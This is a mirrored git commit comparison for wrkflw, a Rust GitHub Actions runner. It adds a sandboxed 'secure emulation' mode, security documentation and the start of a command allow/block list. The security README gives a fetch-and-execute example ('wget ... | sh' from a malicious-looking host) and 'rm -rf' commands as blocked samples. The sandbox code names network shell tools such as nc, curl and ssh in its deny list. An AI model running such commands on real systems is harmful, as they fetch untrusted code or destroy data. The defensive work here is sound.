mirror of
https://github.com/bahdotsh/wrkflw.git
synced 2025-12-29 16:36:38 +01:00
Compare commits
12 Commits
fix/runs-o
...
wrkflw-git
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
960f7486a2 | ||
|
|
cb936cd1af | ||
|
|
625b8111f1 | ||
|
|
b2b6e9e08d | ||
|
|
86660ae573 | ||
|
|
886c415fa7 | ||
|
|
460357d9fe | ||
|
|
096ccfa180 | ||
|
|
8765537cfa | ||
|
|
ac708902ef | ||
|
|
d1268d55cf | ||
|
|
a146d94c35 |
28
Cargo.lock
generated
28
Cargo.lock
generated
@@ -2545,7 +2545,7 @@ checksum = "1e9df38ee2d2c3c5948ea468a8406ff0db0b29ae1ffde1bcf20ef305bcc95c51"
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw"
|
||||
version = "0.6.0"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"bollard",
|
||||
"chrono",
|
||||
@@ -2592,7 +2592,7 @@ dependencies = [
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-evaluator"
|
||||
version = "0.6.0"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"colored",
|
||||
"serde_yaml",
|
||||
@@ -2602,7 +2602,7 @@ dependencies = [
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-executor"
|
||||
version = "0.6.0"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"async-trait",
|
||||
"bollard",
|
||||
@@ -2632,7 +2632,7 @@ dependencies = [
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-github"
|
||||
version = "0.6.0"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"lazy_static",
|
||||
"regex",
|
||||
@@ -2646,7 +2646,7 @@ dependencies = [
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-gitlab"
|
||||
version = "0.6.0"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"lazy_static",
|
||||
"regex",
|
||||
@@ -2661,7 +2661,7 @@ dependencies = [
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-logging"
|
||||
version = "0.6.0"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"chrono",
|
||||
"once_cell",
|
||||
@@ -2672,7 +2672,7 @@ dependencies = [
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-matrix"
|
||||
version = "0.6.0"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"indexmap 2.8.0",
|
||||
"serde",
|
||||
@@ -2683,7 +2683,7 @@ dependencies = [
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-models"
|
||||
version = "0.6.0"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"serde",
|
||||
"serde_json",
|
||||
@@ -2693,7 +2693,7 @@ dependencies = [
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-parser"
|
||||
version = "0.6.0"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"jsonschema",
|
||||
"serde",
|
||||
@@ -2707,14 +2707,16 @@ dependencies = [
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-runtime"
|
||||
version = "0.6.0"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"async-trait",
|
||||
"futures",
|
||||
"once_cell",
|
||||
"regex",
|
||||
"serde",
|
||||
"serde_yaml",
|
||||
"tempfile",
|
||||
"thiserror",
|
||||
"tokio",
|
||||
"which",
|
||||
"wrkflw-logging",
|
||||
@@ -2724,7 +2726,7 @@ dependencies = [
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-ui"
|
||||
version = "0.6.0"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"chrono",
|
||||
"crossterm 0.26.1",
|
||||
@@ -2746,7 +2748,7 @@ dependencies = [
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-utils"
|
||||
version = "0.6.0"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"nix",
|
||||
"serde",
|
||||
@@ -2756,7 +2758,7 @@ dependencies = [
|
||||
|
||||
[[package]]
|
||||
name = "wrkflw-validators"
|
||||
version = "0.6.0"
|
||||
version = "0.7.0"
|
||||
dependencies = [
|
||||
"serde",
|
||||
"serde_yaml",
|
||||
|
||||
@@ -5,7 +5,7 @@ members = [
|
||||
resolver = "2"
|
||||
|
||||
[workspace.package]
|
||||
version = "0.6.0"
|
||||
version = "0.7.0"
|
||||
edition = "2021"
|
||||
description = "A GitHub Actions workflow validator and executor"
|
||||
documentation = "https://github.com/bahdotsh/wrkflw"
|
||||
|
||||
23
README.md
23
README.md
@@ -111,6 +111,12 @@ wrkflw validate path/to/workflow.yml
|
||||
# Validate workflows in a specific directory
|
||||
wrkflw validate path/to/workflows
|
||||
|
||||
# Validate multiple files and/or directories (GitHub and GitLab are auto-detected)
|
||||
wrkflw validate path/to/flow-1.yml path/to/flow-2.yml path/to/workflows
|
||||
|
||||
# Force GitLab parsing for all provided paths
|
||||
wrkflw validate --gitlab .gitlab-ci.yml other.gitlab-ci.yml
|
||||
|
||||
# Validate with verbose output
|
||||
wrkflw validate --verbose path/to/workflow.yml
|
||||
|
||||
@@ -437,19 +443,28 @@ jobs:
|
||||
### Runtime Mode Differences
|
||||
- **Docker Mode**: Provides the closest match to GitHub's environment, including support for Docker container actions, service containers, and Linux-based jobs. Some advanced container configurations may still require manual setup.
|
||||
- **Podman Mode**: Similar to Docker mode but uses Podman for container execution. Offers rootless container support and enhanced security. Fully compatible with Docker-based workflows.
|
||||
- **Emulation Mode**: Runs workflows using the local system tools. Limitations:
|
||||
- **🔒 Secure Emulation Mode**: Runs workflows on the local system with comprehensive sandboxing for security. **Recommended for local development**:
|
||||
- Command validation and filtering (blocks dangerous commands like `rm -rf /`, `sudo`, etc.)
|
||||
- Resource limits (CPU, memory, execution time)
|
||||
- Filesystem access controls
|
||||
- Process monitoring and limits
|
||||
- Safe for running untrusted workflows locally
|
||||
- **⚠️ Emulation Mode (Legacy)**: Runs workflows using local system tools without sandboxing. **Not recommended - use Secure Emulation instead**:
|
||||
- Only supports local and JavaScript actions (no Docker container actions)
|
||||
- No support for service containers
|
||||
- No caching support
|
||||
- **No security protections - can execute harmful commands**
|
||||
- Some actions may require adaptation to work locally
|
||||
- Special action handling is more limited
|
||||
|
||||
### Best Practices
|
||||
- Test workflows in both Docker and emulation modes to ensure compatibility
|
||||
- **Use Secure Emulation mode for local development** - provides safety without container overhead
|
||||
- Test workflows in multiple runtime modes to ensure compatibility
|
||||
- **Use Docker/Podman mode for production** - provides maximum isolation and reproducibility
|
||||
- Keep matrix builds reasonably sized for better performance
|
||||
- Use environment variables instead of GitHub secrets when possible
|
||||
- Consider using local actions for complex custom functionality
|
||||
- Test network-dependent actions carefully in both modes
|
||||
- **Review security warnings** - pay attention to blocked commands in secure emulation mode
|
||||
- **Start with secure mode** - only fall back to legacy emulation if necessary
|
||||
|
||||
## Roadmap
|
||||
|
||||
|
||||
@@ -12,9 +12,9 @@ categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.6.0" }
|
||||
wrkflw-validators = { path = "../validators", version = "0.6.0" }
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-validators = { path = "../validators", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
colored.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
|
||||
@@ -12,12 +12,12 @@ categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.6.0" }
|
||||
wrkflw-parser = { path = "../parser", version = "0.6.0" }
|
||||
wrkflw-runtime = { path = "../runtime", version = "0.6.0" }
|
||||
wrkflw-logging = { path = "../logging", version = "0.6.0" }
|
||||
wrkflw-matrix = { path = "../matrix", version = "0.6.0" }
|
||||
wrkflw-utils = { path = "../utils", version = "0.6.0" }
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-parser = { path = "../parser", version = "0.7.0" }
|
||||
wrkflw-runtime = { path = "../runtime", version = "0.7.0" }
|
||||
wrkflw-logging = { path = "../logging", version = "0.7.0" }
|
||||
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
|
||||
wrkflw-utils = { path = "../utils", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
async-trait.workspace = true
|
||||
|
||||
@@ -98,6 +98,7 @@ async fn execute_github_workflow(
|
||||
"WRKFLW_RUNTIME_MODE".to_string(),
|
||||
match config.runtime_type {
|
||||
RuntimeType::Emulation => "emulation".to_string(),
|
||||
RuntimeType::SecureEmulation => "secure_emulation".to_string(),
|
||||
RuntimeType::Docker => "docker".to_string(),
|
||||
RuntimeType::Podman => "podman".to_string(),
|
||||
},
|
||||
@@ -198,6 +199,7 @@ async fn execute_gitlab_pipeline(
|
||||
"WRKFLW_RUNTIME_MODE".to_string(),
|
||||
match config.runtime_type {
|
||||
RuntimeType::Emulation => "emulation".to_string(),
|
||||
RuntimeType::SecureEmulation => "secure_emulation".to_string(),
|
||||
RuntimeType::Docker => "docker".to_string(),
|
||||
RuntimeType::Podman => "podman".to_string(),
|
||||
},
|
||||
@@ -400,6 +402,9 @@ fn initialize_runtime(
|
||||
}
|
||||
}
|
||||
RuntimeType::Emulation => Ok(Box::new(emulation::EmulationRuntime::new())),
|
||||
RuntimeType::SecureEmulation => Ok(Box::new(
|
||||
wrkflw_runtime::secure_emulation::SecureEmulationRuntime::new(),
|
||||
)),
|
||||
}
|
||||
}
|
||||
|
||||
@@ -408,6 +413,7 @@ pub enum RuntimeType {
|
||||
Docker,
|
||||
Podman,
|
||||
Emulation,
|
||||
SecureEmulation,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone)]
|
||||
|
||||
@@ -12,7 +12,7 @@ categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.6.0" }
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
|
||||
# External dependencies from workspace
|
||||
serde.workspace = true
|
||||
|
||||
@@ -12,7 +12,7 @@ categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.6.0" }
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
lazy_static.workspace = true
|
||||
|
||||
@@ -12,7 +12,7 @@ categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.6.0" }
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
chrono.workspace = true
|
||||
|
||||
@@ -12,7 +12,7 @@ categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.6.0" }
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
indexmap.workspace = true
|
||||
|
||||
@@ -14,4 +14,4 @@ categories.workspace = true
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
serde_json.workspace = true
|
||||
thiserror.workspace = true
|
||||
thiserror.workspace = true
|
||||
|
||||
@@ -12,8 +12,8 @@ categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.6.0" }
|
||||
wrkflw-matrix = { path = "../matrix", version = "0.6.0" }
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
jsonschema.workspace = true
|
||||
|
||||
@@ -12,8 +12,8 @@ categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.6.0" }
|
||||
wrkflw-logging = { path = "../logging", version = "0.6.0" }
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-logging = { path = "../logging", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
async-trait.workspace = true
|
||||
@@ -23,5 +23,7 @@ serde_yaml.workspace = true
|
||||
tempfile = "3.9"
|
||||
tokio.workspace = true
|
||||
futures = "0.3"
|
||||
wrkflw-utils = { path = "../utils", version = "0.6.0" }
|
||||
wrkflw-utils = { path = "../utils", version = "0.7.0" }
|
||||
which = "4.4"
|
||||
regex = "1.10"
|
||||
thiserror = "1.0"
|
||||
|
||||
258
crates/runtime/README_SECURITY.md
Normal file
258
crates/runtime/README_SECURITY.md
Normal file
@@ -0,0 +1,258 @@
|
||||
# Security Features in wrkflw Runtime
|
||||
|
||||
This document describes the security features implemented in the wrkflw runtime, particularly the sandboxing capabilities for emulation mode.
|
||||
|
||||
## Overview
|
||||
|
||||
The wrkflw runtime provides multiple execution modes with varying levels of security:
|
||||
|
||||
1. **Docker Mode** - Uses Docker containers for isolation (recommended for production)
|
||||
2. **Podman Mode** - Uses Podman containers for isolation with rootless support
|
||||
3. **Secure Emulation Mode** - 🔒 **NEW**: Sandboxed execution on the host system
|
||||
4. **Emulation Mode** - ⚠️ **UNSAFE**: Direct execution on the host system (deprecated)
|
||||
|
||||
## Security Modes
|
||||
|
||||
### 🔒 Secure Emulation Mode (Recommended for Local Development)
|
||||
|
||||
The secure emulation mode provides comprehensive sandboxing to protect your system from potentially harmful commands while still allowing legitimate workflow operations.
|
||||
|
||||
#### Features
|
||||
|
||||
- **Command Validation**: Blocks dangerous commands like `rm -rf /`, `dd`, `sudo`, etc.
|
||||
- **Pattern Detection**: Uses regex patterns to detect dangerous command combinations
|
||||
- **Resource Limits**: Enforces CPU, memory, and execution time limits
|
||||
- **Filesystem Isolation**: Restricts file access to allowed paths only
|
||||
- **Environment Sanitization**: Filters dangerous environment variables
|
||||
- **Process Monitoring**: Tracks and limits spawned processes
|
||||
|
||||
#### Usage
|
||||
|
||||
```bash
|
||||
# Use secure emulation mode (recommended)
|
||||
wrkflw run --runtime secure-emulation .github/workflows/build.yml
|
||||
|
||||
# Or via TUI
|
||||
wrkflw tui --runtime secure-emulation
|
||||
```
|
||||
|
||||
#### Command Whitelist/Blacklist
|
||||
|
||||
**Allowed Commands (Safe):**
|
||||
- Basic utilities: `echo`, `cat`, `ls`, `grep`, `sed`, `awk`
|
||||
- Development tools: `cargo`, `npm`, `python`, `git`, `node`
|
||||
- Build tools: `make`, `cmake`, `javac`, `dotnet`
|
||||
|
||||
**Blocked Commands (Dangerous):**
|
||||
- System modification: `rm`, `dd`, `mkfs`, `mount`, `sudo`
|
||||
- Network tools: `wget`, `curl`, `ssh`, `nc`
|
||||
- Process control: `kill`, `killall`, `systemctl`
|
||||
|
||||
#### Resource Limits
|
||||
|
||||
```rust
|
||||
// Default configuration
|
||||
SandboxConfig {
|
||||
max_execution_time: Duration::from_secs(300), // 5 minutes
|
||||
max_memory_mb: 512, // 512 MB
|
||||
max_cpu_percent: 80, // 80% CPU
|
||||
max_processes: 10, // Max 10 processes
|
||||
allow_network: false, // No network access
|
||||
strict_mode: true, // Whitelist-only mode
|
||||
}
|
||||
```
|
||||
|
||||
### ⚠️ Legacy Emulation Mode (Unsafe)
|
||||
|
||||
The original emulation mode executes commands directly on the host system without any sandboxing. **This mode will be deprecated and should only be used for trusted workflows.**
|
||||
|
||||
```bash
|
||||
# Legacy unsafe mode (not recommended)
|
||||
wrkflw run --runtime emulation .github/workflows/build.yml
|
||||
```
|
||||
|
||||
## Example: Blocked vs Allowed Commands
|
||||
|
||||
### ❌ Blocked Commands
|
||||
|
||||
```yaml
|
||||
# This workflow will be blocked in secure emulation mode
|
||||
steps:
|
||||
- name: Dangerous command
|
||||
run: rm -rf /tmp/* # BLOCKED: Dangerous file deletion
|
||||
|
||||
- name: System modification
|
||||
run: sudo apt-get install package # BLOCKED: sudo usage
|
||||
|
||||
- name: Network access
|
||||
run: wget https://malicious-site.com/script.sh | sh # BLOCKED: wget + shell execution
|
||||
```
|
||||
|
||||
### ✅ Allowed Commands
|
||||
|
||||
```yaml
|
||||
# This workflow will run successfully in secure emulation mode
|
||||
steps:
|
||||
- name: Build project
|
||||
run: cargo build --release # ALLOWED: Development tool
|
||||
|
||||
- name: Run tests
|
||||
run: cargo test # ALLOWED: Testing
|
||||
|
||||
- name: List files
|
||||
run: ls -la target/ # ALLOWED: Safe file listing
|
||||
|
||||
- name: Format code
|
||||
run: cargo fmt --check # ALLOWED: Code formatting
|
||||
```
|
||||
|
||||
## Security Warnings and Messages
|
||||
|
||||
When dangerous commands are detected, wrkflw provides clear security messages:
|
||||
|
||||
```
|
||||
🚫 SECURITY BLOCK: Command 'rm' is not allowed in secure emulation mode.
|
||||
This command was blocked for security reasons.
|
||||
If you need to run this command, please use Docker or Podman mode instead.
|
||||
```
|
||||
|
||||
```
|
||||
🚫 SECURITY BLOCK: Dangerous command pattern detected: 'rm -rf /'.
|
||||
This command was blocked because it matches a known dangerous pattern.
|
||||
Please review your workflow for potentially harmful commands.
|
||||
```
|
||||
|
||||
## Configuration Examples
|
||||
|
||||
### Workflow-Friendly Configuration
|
||||
|
||||
```rust
|
||||
use wrkflw_runtime::sandbox::create_workflow_sandbox_config;
|
||||
|
||||
let config = create_workflow_sandbox_config();
|
||||
// - Allows network access for package downloads
|
||||
// - Higher resource limits for CI/CD workloads
|
||||
// - Less strict mode for development flexibility
|
||||
```
|
||||
|
||||
### Strict Security Configuration
|
||||
|
||||
```rust
|
||||
use wrkflw_runtime::sandbox::create_strict_sandbox_config;
|
||||
|
||||
let config = create_strict_sandbox_config();
|
||||
// - No network access
|
||||
// - Very limited command set
|
||||
// - Low resource limits
|
||||
// - Strict whitelist-only mode
|
||||
```
|
||||
|
||||
### Custom Configuration
|
||||
|
||||
```rust
|
||||
use wrkflw_runtime::sandbox::{SandboxConfig, Sandbox};
|
||||
use std::collections::HashSet;
|
||||
use std::path::PathBuf;
|
||||
|
||||
let mut config = SandboxConfig::default();
|
||||
|
||||
// Custom allowed commands
|
||||
config.allowed_commands = ["echo", "ls", "cargo"]
|
||||
.iter()
|
||||
.map(|s| s.to_string())
|
||||
.collect();
|
||||
|
||||
// Custom resource limits
|
||||
config.max_execution_time = Duration::from_secs(60);
|
||||
config.max_memory_mb = 256;
|
||||
|
||||
// Custom allowed paths
|
||||
config.allowed_write_paths.insert(PathBuf::from("./target"));
|
||||
config.allowed_read_paths.insert(PathBuf::from("./src"));
|
||||
|
||||
let sandbox = Sandbox::new(config)?;
|
||||
```
|
||||
|
||||
## Migration Guide
|
||||
|
||||
### From Unsafe Emulation to Secure Emulation
|
||||
|
||||
1. **Change Runtime Flag**:
|
||||
```bash
|
||||
# Old (unsafe)
|
||||
wrkflw run --runtime emulation workflow.yml
|
||||
|
||||
# New (secure)
|
||||
wrkflw run --runtime secure-emulation workflow.yml
|
||||
```
|
||||
|
||||
2. **Review Workflow Commands**: Check for any commands that might be blocked and adjust if necessary.
|
||||
|
||||
3. **Handle Security Blocks**: If legitimate commands are blocked, consider:
|
||||
- Using Docker/Podman mode for those specific workflows
|
||||
- Modifying the workflow to use allowed alternatives
|
||||
- Creating a custom sandbox configuration
|
||||
|
||||
### When to Use Each Mode
|
||||
|
||||
| Use Case | Recommended Mode | Reason |
|
||||
|----------|------------------|---------|
|
||||
| Local development | Secure Emulation | Good balance of security and convenience |
|
||||
| Untrusted workflows | Docker/Podman | Maximum isolation |
|
||||
| CI/CD pipelines | Docker/Podman | Consistent, reproducible environment |
|
||||
| Testing workflows | Secure Emulation | Fast execution with safety |
|
||||
| Trusted internal workflows | Secure Emulation | Sufficient security for known-safe code |
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Command Blocked Error
|
||||
|
||||
If you encounter a security block:
|
||||
|
||||
1. **Check if the command is necessary**: Can you achieve the same result with an allowed command?
|
||||
2. **Use container mode**: Switch to Docker or Podman mode for unrestricted execution
|
||||
3. **Modify the workflow**: Use safer alternatives where possible
|
||||
|
||||
### Resource Limit Exceeded
|
||||
|
||||
If your workflow hits resource limits:
|
||||
|
||||
1. **Optimize the workflow**: Reduce resource usage where possible
|
||||
2. **Use custom configuration**: Increase limits for specific use cases
|
||||
3. **Use container mode**: For resource-intensive workflows
|
||||
|
||||
### Path Access Denied
|
||||
|
||||
If file access is denied:
|
||||
|
||||
1. **Check allowed paths**: Ensure your workflow only accesses permitted directories
|
||||
2. **Use relative paths**: Work within the project directory
|
||||
3. **Use container mode**: For workflows requiring system-wide file access
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Default to Secure Mode**: Use secure emulation mode by default for local development
|
||||
2. **Test Workflows**: Always test workflows in secure mode before deploying
|
||||
3. **Review Security Messages**: Pay attention to security blocks and warnings
|
||||
4. **Use Containers for Production**: Use Docker/Podman for production deployments
|
||||
5. **Regular Updates**: Keep wrkflw updated for the latest security improvements
|
||||
|
||||
## Security Considerations
|
||||
|
||||
- Secure emulation mode is designed to prevent **accidental** harmful commands, not to stop **determined** attackers
|
||||
- For maximum security with untrusted code, always use container modes
|
||||
- The sandbox is most effective against script errors and typos that could damage your system
|
||||
- Always review workflows from untrusted sources before execution
|
||||
|
||||
## Contributing Security Improvements
|
||||
|
||||
If you find security issues or have suggestions for improvements:
|
||||
|
||||
1. **Report Security Issues**: Use responsible disclosure for security vulnerabilities
|
||||
2. **Suggest Command Patterns**: Help improve dangerous pattern detection
|
||||
3. **Test Edge Cases**: Help us identify bypass techniques
|
||||
4. **Documentation**: Improve security documentation and examples
|
||||
|
||||
---
|
||||
|
||||
For more information, see the main [README.md](../../README.md) and [Security Policy](../../SECURITY.md).
|
||||
@@ -24,6 +24,7 @@ pub trait ContainerRuntime {
|
||||
) -> Result<String, ContainerError>;
|
||||
}
|
||||
|
||||
#[derive(Debug)]
|
||||
pub struct ContainerOutput {
|
||||
pub stdout: String,
|
||||
pub stderr: String,
|
||||
|
||||
@@ -2,3 +2,5 @@
|
||||
|
||||
pub mod container;
|
||||
pub mod emulation;
|
||||
pub mod sandbox;
|
||||
pub mod secure_emulation;
|
||||
|
||||
672
crates/runtime/src/sandbox.rs
Normal file
672
crates/runtime/src/sandbox.rs
Normal file
@@ -0,0 +1,672 @@
|
||||
use regex::Regex;
|
||||
use std::collections::HashSet;
|
||||
use std::fs;
|
||||
use std::path::{Path, PathBuf};
|
||||
use std::process::{Command, Stdio};
|
||||
use std::time::Duration;
|
||||
use tempfile::TempDir;
|
||||
use wrkflw_logging;
|
||||
|
||||
/// Configuration for sandbox execution
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct SandboxConfig {
|
||||
/// Maximum execution time for commands
|
||||
pub max_execution_time: Duration,
|
||||
/// Maximum memory usage in MB
|
||||
pub max_memory_mb: u64,
|
||||
/// Maximum CPU usage percentage
|
||||
pub max_cpu_percent: u64,
|
||||
/// Allowed commands (whitelist)
|
||||
pub allowed_commands: HashSet<String>,
|
||||
/// Blocked commands (blacklist)
|
||||
pub blocked_commands: HashSet<String>,
|
||||
/// Allowed file system paths (read-only)
|
||||
pub allowed_read_paths: HashSet<PathBuf>,
|
||||
/// Allowed file system paths (read-write)
|
||||
pub allowed_write_paths: HashSet<PathBuf>,
|
||||
/// Whether to enable network access
|
||||
pub allow_network: bool,
|
||||
/// Maximum number of processes
|
||||
pub max_processes: u32,
|
||||
/// Whether to enable strict mode (more restrictive)
|
||||
pub strict_mode: bool,
|
||||
}
|
||||
|
||||
impl Default for SandboxConfig {
|
||||
fn default() -> Self {
|
||||
let mut allowed_commands = HashSet::new();
|
||||
|
||||
// Basic safe commands
|
||||
allowed_commands.insert("echo".to_string());
|
||||
allowed_commands.insert("printf".to_string());
|
||||
allowed_commands.insert("cat".to_string());
|
||||
allowed_commands.insert("head".to_string());
|
||||
allowed_commands.insert("tail".to_string());
|
||||
allowed_commands.insert("grep".to_string());
|
||||
allowed_commands.insert("sed".to_string());
|
||||
allowed_commands.insert("awk".to_string());
|
||||
allowed_commands.insert("sort".to_string());
|
||||
allowed_commands.insert("uniq".to_string());
|
||||
allowed_commands.insert("wc".to_string());
|
||||
allowed_commands.insert("cut".to_string());
|
||||
allowed_commands.insert("tr".to_string());
|
||||
allowed_commands.insert("which".to_string());
|
||||
allowed_commands.insert("pwd".to_string());
|
||||
allowed_commands.insert("env".to_string());
|
||||
allowed_commands.insert("date".to_string());
|
||||
allowed_commands.insert("basename".to_string());
|
||||
allowed_commands.insert("dirname".to_string());
|
||||
|
||||
// File operations (safe variants)
|
||||
allowed_commands.insert("ls".to_string());
|
||||
allowed_commands.insert("find".to_string());
|
||||
allowed_commands.insert("mkdir".to_string());
|
||||
allowed_commands.insert("touch".to_string());
|
||||
allowed_commands.insert("cp".to_string());
|
||||
allowed_commands.insert("mv".to_string());
|
||||
|
||||
// Development tools
|
||||
allowed_commands.insert("git".to_string());
|
||||
allowed_commands.insert("cargo".to_string());
|
||||
allowed_commands.insert("rustc".to_string());
|
||||
allowed_commands.insert("rustfmt".to_string());
|
||||
allowed_commands.insert("clippy".to_string());
|
||||
allowed_commands.insert("npm".to_string());
|
||||
allowed_commands.insert("yarn".to_string());
|
||||
allowed_commands.insert("node".to_string());
|
||||
allowed_commands.insert("python".to_string());
|
||||
allowed_commands.insert("python3".to_string());
|
||||
allowed_commands.insert("pip".to_string());
|
||||
allowed_commands.insert("pip3".to_string());
|
||||
allowed_commands.insert("java".to_string());
|
||||
allowed_commands.insert("javac".to_string());
|
||||
allowed_commands.insert("maven".to_string());
|
||||
allowed_commands.insert("gradle".to_string());
|
||||
allowed_commands.insert("go".to_string());
|
||||
allowed_commands.insert("dotnet".to_string());
|
||||
|
||||
// Compression tools
|
||||
allowed_commands.insert("tar".to_string());
|
||||
allowed_commands.insert("gzip".to_string());
|
||||
allowed_commands.insert("gunzip".to_string());
|
||||
allowed_commands.insert("zip".to_string());
|
||||
allowed_commands.insert("unzip".to_string());
|
||||
|
||||
let mut blocked_commands = HashSet::new();
|
||||
|
||||
// Dangerous system commands
|
||||
blocked_commands.insert("rm".to_string());
|
||||
blocked_commands.insert("rmdir".to_string());
|
||||
blocked_commands.insert("dd".to_string());
|
||||
blocked_commands.insert("mkfs".to_string());
|
||||
blocked_commands.insert("fdisk".to_string());
|
||||
blocked_commands.insert("mount".to_string());
|
||||
blocked_commands.insert("umount".to_string());
|
||||
blocked_commands.insert("sudo".to_string());
|
||||
blocked_commands.insert("su".to_string());
|
||||
blocked_commands.insert("passwd".to_string());
|
||||
blocked_commands.insert("chown".to_string());
|
||||
blocked_commands.insert("chmod".to_string());
|
||||
blocked_commands.insert("chgrp".to_string());
|
||||
blocked_commands.insert("chroot".to_string());
|
||||
|
||||
// Network and system tools
|
||||
blocked_commands.insert("nc".to_string());
|
||||
blocked_commands.insert("netcat".to_string());
|
||||
blocked_commands.insert("wget".to_string());
|
||||
blocked_commands.insert("curl".to_string());
|
||||
blocked_commands.insert("ssh".to_string());
|
||||
blocked_commands.insert("scp".to_string());
|
||||
blocked_commands.insert("rsync".to_string());
|
||||
|
||||
// Process control
|
||||
blocked_commands.insert("kill".to_string());
|
||||
blocked_commands.insert("killall".to_string());
|
||||
blocked_commands.insert("pkill".to_string());
|
||||
blocked_commands.insert("nohup".to_string());
|
||||
blocked_commands.insert("screen".to_string());
|
||||
blocked_commands.insert("tmux".to_string());
|
||||
|
||||
// System modification
|
||||
blocked_commands.insert("systemctl".to_string());
|
||||
blocked_commands.insert("service".to_string());
|
||||
blocked_commands.insert("crontab".to_string());
|
||||
blocked_commands.insert("at".to_string());
|
||||
blocked_commands.insert("reboot".to_string());
|
||||
blocked_commands.insert("shutdown".to_string());
|
||||
blocked_commands.insert("halt".to_string());
|
||||
blocked_commands.insert("poweroff".to_string());
|
||||
|
||||
Self {
|
||||
max_execution_time: Duration::from_secs(300), // 5 minutes
|
||||
max_memory_mb: 512,
|
||||
max_cpu_percent: 80,
|
||||
allowed_commands,
|
||||
blocked_commands,
|
||||
allowed_read_paths: HashSet::new(),
|
||||
allowed_write_paths: HashSet::new(),
|
||||
allow_network: false,
|
||||
max_processes: 10,
|
||||
strict_mode: true,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Sandbox error types
|
||||
#[derive(Debug, thiserror::Error)]
|
||||
pub enum SandboxError {
|
||||
#[error("Command blocked by security policy: {command}")]
|
||||
BlockedCommand { command: String },
|
||||
|
||||
#[error("Dangerous command pattern detected: {pattern}")]
|
||||
DangerousPattern { pattern: String },
|
||||
|
||||
#[error("Path access denied: {path}")]
|
||||
PathAccessDenied { path: String },
|
||||
|
||||
#[error("Resource limit exceeded: {resource}")]
|
||||
ResourceLimitExceeded { resource: String },
|
||||
|
||||
#[error("Execution timeout after {seconds} seconds")]
|
||||
ExecutionTimeout { seconds: u64 },
|
||||
|
||||
#[error("Sandbox setup failed: {reason}")]
|
||||
SandboxSetupError { reason: String },
|
||||
|
||||
#[error("Command execution failed: {reason}")]
|
||||
ExecutionError { reason: String },
|
||||
}
|
||||
|
||||
/// Secure sandbox for executing commands in emulation mode
|
||||
pub struct Sandbox {
|
||||
config: SandboxConfig,
|
||||
workspace: TempDir,
|
||||
dangerous_patterns: Vec<Regex>,
|
||||
}
|
||||
|
||||
impl Sandbox {
|
||||
/// Create a new sandbox with the given configuration
|
||||
pub fn new(config: SandboxConfig) -> Result<Self, SandboxError> {
|
||||
let workspace = tempfile::tempdir().map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to create sandbox workspace: {}", e),
|
||||
})?;
|
||||
|
||||
let dangerous_patterns = Self::compile_dangerous_patterns();
|
||||
|
||||
